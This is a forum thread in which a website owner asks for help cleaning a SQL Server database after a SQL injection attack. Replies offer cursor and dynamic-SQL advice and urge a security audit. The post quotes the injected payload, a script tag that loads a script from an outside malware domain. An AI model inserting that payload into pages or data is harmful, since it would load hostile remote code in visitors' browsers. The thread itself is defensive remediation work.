Please start any new threads on our new site at https://forums.sqlteam.com. We've got lots of great SQL Server experts to answer whatever question you can come up with.

 All Forums
 General SQL Server Forums
 New to SQL Server Programming
 HAcked with SQL injection

Author  Topic 

iurisampaio
Starting Member

2 Posts
Posted - 2012-09-09 : 13:15:45
Hi there,

My website got hacked and my database is totally messed up with malware links placed on all its coliumns through a SQL injection invasion.

Surely and Fortunately, I figured out that the malicious as its length limited in 72 chars. Here it is:

"></title><script src="http://eighbo02rsbarr.rr.nu/sl.php"></script><!--



In order to fix that without loosing anything of the current data, I decided to remove the suspicious string from "every" column of "every" table that is infected with the malware code. To accomplish that I wrote the following plan

Get all the tables of the database schema and all columns of each table as in:

SELECT t.name AS table_name, SCHEMA_NAME(schema_id) AS schema_name, c.name AS column_name
FROM sys.tables AS t
INNER JOIN sys.columns c ON t.OBJECT_ID = c.OBJECT_ID
ORDER BY schema_name, table_name;



Then, to update the value of each column, by removing "only" the malicious code, through a loop statement or whatever else statement that would accomplish this task at once or step by step, using the query bellow ...

UPDATE table_name SET column_name = RIGHT(column_name, LEN(column_name) – 72) WHERE column_name LIKE '%http://eighbo02rsbarr.rr.nu/sl.php';



Am I in the correct path?

How would I join these two steps (get all the tables and columns, update the new value) into a plain MS SQL Server script?

visakh16
Very Important crosS Applying yaK Herder

52326 Posts
Posted - 2012-09-09 : 13:26:45
you would need a cursor logic to loop through results of first statement and then use dynamic sql to form update string each time and use exec(@sql) to execute sql string

------------------------------------------------------------------------------------------------------
SQL Server MVP
http://visakhm.blogspot.com/
Go to Top of Page

Transact Charlie
Master Smack Fu Yak Hacker

3451 Posts
Posted - 2012-09-09 : 18:57:31
did you eliminate your vulnerability?

Now would be an *excellent* time to audit the code........

How is access to the database secured? via roles?



Transact Charlie
Msg 3903.. The ROLLBACK TRANSACTION request has no corresponding BEGIN TRANSACTION.
http://nosqlsolution.blogspot.co.uk/
Go to Top of Page

iurisampaio
Starting Member

2 Posts
Posted - 2012-09-09 : 20:14:34
I followed your tip and wrote the query bellow.

However I am still getting an error of
UPDATE [dbo].[ProductOption] SET [ProductOptionName] = RIGHT([ProductOptionName], LEN([ProductOptionName]) - 72) WHERE [ProductOptionName] LIKE '%http://eighbo02rsbarr.rr.nu/sl.php%'
Msg 203, Level 16, State 2, Line 27
The name 'UPDATE [dbo].[ProductOption] SET [ProductOptionName] = RIGHT([ProductOptionName], LEN([ProductOptionName]) - 72) WHERE [ProductOptionName] LIKE '%http://eighbo02rsbarr.rr.nu/sl.php%'' is not a valid identifier.


Any ideas?



DECLARE @sql VARCHAR(8000)

DECLARE curUpdateQueries CURSOR FAST_FORWARD FOR
SELECT
N'UPDATE '
+ QUOTENAME(SCHEMA_NAME(t.schema_id))
+ N'.'
+ QUOTENAME(t.name)
+ N' SET '
+ QUOTENAME(c.name)
+ N' = RIGHT(' + QUOTENAME(c.name) + N', LEN(' + QUOTENAME(c.name) + ') - 72)'
+ N' WHERE ' + QUOTENAME(c.name) + N' LIKE ''%http://eighbo02rsbarr.rr.nu/sl.php%'''
FROM sys.tables AS t
JOIN sys.columns AS c ON t.object_id = c.object_id
JOIN sys.types AS ty ON ty.system_type_id = c.system_type_id AND ty.user_type_id = c.user_type_id
WHERE
ty.name IN(N'varchar', N'char', N'nvarchar', N'nchar')
AND OBJECTPROPERTY(t.object_id, 'IsMSShipped') = 0;

OPEN CurUpdateQueries
FETCH NEXT FROM curUpdateQueries INTO @sql

WHILE @@FETCH_STATUS = 0
BEGIN
PRINT @SQL
-- If you want to execute
EXEC @SQL
FETCH NEXT FROM curUpdateQueries INTO @sql
END
CLOSE curUpdateQueries
DEALLOCATE curUpdateQueries
Go to Top of Page

Transact Charlie
Master Smack Fu Yak Hacker

3451 Posts
Posted - 2012-09-10 : 04:07:36
if you call dynamic sql with EXEC you have to wrap it in ( )

Change 

-- If you want to execute
EXEC @SQL

To

EXEC (@SQL)


Transact Charlie
Msg 3903.. The ROLLBACK TRANSACTION request has no corresponding BEGIN TRANSACTION.
http://nosqlsolution.blogspot.co.uk/
Go to Top of Page

madhivanan
Premature Yak Congratulator

22864 Posts
Posted - 2012-09-13 : 04:15:04
This will give you list of tables and columns where the string is found
http://beyondrelational.com/modules/2/blogs/70/posts/10883/search-a-value-in-character-column-of-all-tables.aspx

Madhivanan

Failing to plan is Planning to fail
Go to Top of Page
   

Subscribe to SQLTeam.com

SQLTeam.com Articles via RSS

SQLTeam.com Weblog via RSS

- Advertisement -

Resources

Articles

Forums

Blogs

Contact Us

About the Site